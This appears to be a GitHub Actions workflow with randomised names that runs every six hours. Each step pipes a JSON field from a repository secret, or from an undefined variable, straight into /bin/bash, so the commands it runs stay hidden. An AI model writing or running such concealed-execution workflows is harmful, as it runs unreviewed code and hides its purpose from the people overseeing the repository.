name: lindaiyan4635

on:
  workflow_dispatch:
  schedule:
    - cron: '10 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: lindaiyan4635
        env:
          ebs4515: ${{ secrets.ebs4515 }}
        run: |
          echo $ebs4515 | jq -r .moely81861 | /bin/bash
          echo $rrf5 | jq -r .ska8 | /bin/bash
          echo $njkf78214 | jq -r .dqgho2398 | /bin/bash
          echo $k17 | jq -r .tdzpe4 | /bin/bash

